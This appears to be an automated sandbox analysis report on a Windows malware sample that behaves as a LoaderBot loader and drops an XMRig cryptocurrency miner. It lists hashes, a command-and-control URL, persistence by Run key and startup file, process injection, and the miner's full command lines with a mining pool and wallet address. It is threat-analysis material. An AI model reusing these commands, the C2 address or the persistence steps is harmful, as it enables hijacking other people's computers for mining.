Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
12-04-2023 16:09
Static task
static1
Behavioral task
behavioral1
Sample
f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe
Resource
win10v2004-20230221-en
General
-
Target
f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe
-
Size
5.0MB
-
MD5
8f36b3fba4e5d51d40026e16fbc7742e
-
SHA1
00162dcf53957e496540b1c3fbc0ca2b02e7620b
-
SHA256
f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605
-
SHA512
2e67daea2946e8de5bb2fb9b91fac886569f4f9aeb9e39798c95466a326498bd41da9c09ba9cfe7f367f604eb51bc3f6b27becccf2b533d1d9e0318de6ba6be5
-
SSDEEP
98304:CKTqoFhD35ATaYuL27df4TGBEGRWmybmIyvCFXQn1fzO+W:CmgaYuL27ReGBEGRWFbivcQ1Lw
Malware Config
Extracted
loaderbot
http://gerag2pe.beget.tech/cmd.php
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/4924-133-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot -
XMRig Miner payload 18 IoCs
resource yara_rule behavioral1/memory/1736-149-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1736-150-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-156-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-157-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-158-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-161-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-164-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-165-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-166-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-167-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-168-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-169-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-170-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-171-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-172-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-173-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1224-174-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/4720-180-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url InstallUtil.exe -
Executes dropped EXE 4 IoCs
pid Process 1736 Driver.exe 1224 Driver.exe 4720 Driver.exe 4664 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\InstallUtil.exe" InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1188 set thread context of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 -
Program crash 3 IoCs
pid pid_target Process procid_target 852 1736 WerFault.exe 90 5024 1224 WerFault.exe 95 3620 4720 WerFault.exe 103 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe 4924 InstallUtil.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 648 Process not Found 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4924 InstallUtil.exe Token: SeLockMemoryPrivilege 1736 Driver.exe Token: SeLockMemoryPrivilege 1736 Driver.exe Token: SeLockMemoryPrivilege 1224 Driver.exe Token: SeLockMemoryPrivilege 1224 Driver.exe Token: SeLockMemoryPrivilege 4664 Driver.exe Token: SeLockMemoryPrivilege 4664 Driver.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1188 wrote to memory of 740 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 83 PID 1188 wrote to memory of 740 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 83 PID 1188 wrote to memory of 740 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 83 PID 1188 wrote to memory of 740 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 83 PID 1188 wrote to memory of 4388 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 84 PID 1188 wrote to memory of 4388 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 84 PID 1188 wrote to memory of 4388 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 84 PID 1188 wrote to memory of 4388 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 84 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 1188 wrote to memory of 4924 1188 f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe 85 PID 4924 wrote to memory of 1736 4924 InstallUtil.exe 90 PID 4924 wrote to memory of 1736 4924 InstallUtil.exe 90 PID 4924 wrote to memory of 1224 4924 InstallUtil.exe 95 PID 4924 wrote to memory of 1224 4924 InstallUtil.exe 95 PID 4924 wrote to memory of 4720 4924 InstallUtil.exe 103 PID 4924 wrote to memory of 4720 4924 InstallUtil.exe 103 PID 4924 wrote to memory of 4664 4924 InstallUtil.exe 107 PID 4924 wrote to memory of 4664 4924 InstallUtil.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe"C:\Users\Admin\AppData\Local\Temp\f4e4abc185d26f1bbb6f7c50245aace36bccf338a2f4e77ce358b36872079605.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵PID:740
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵PID:4388
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 43vDzCah59pa7NjPUPS2ow6tp1drE7MUU188sTbUJ1wzNyfnvRyDdtic8C4kPMambW1PcRMbkBgvbM157NBNjs3tRWxYy83 -p x -k -v=0 --donate-level=0 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1736 -s 7644⤵
- Program crash
PID:852
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 43vDzCah59pa7NjPUPS2ow6tp1drE7MUU188sTbUJ1wzNyfnvRyDdtic8C4kPMambW1PcRMbkBgvbM157NBNjs3tRWxYy83 -p x -k -v=0 --donate-level=0 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1224 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1224 -s 8524⤵
- Program crash
PID:5024
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 43vDzCah59pa7NjPUPS2ow6tp1drE7MUU188sTbUJ1wzNyfnvRyDdtic8C4kPMambW1PcRMbkBgvbM157NBNjs3tRWxYy83 -p x -k -v=0 --donate-level=0 -t 23⤵
- Executes dropped EXE
PID:4720 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4720 -s 5564⤵
- Program crash
PID:3620
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 43vDzCah59pa7NjPUPS2ow6tp1drE7MUU188sTbUJ1wzNyfnvRyDdtic8C4kPMambW1PcRMbkBgvbM157NBNjs3tRWxYy83 -p x -k -v=0 --donate-level=0 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 1736 -ip 17361⤵PID:2840
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 184 -p 1224 -ip 12241⤵PID:2152
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 4720 -ip 47201⤵PID:3608
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322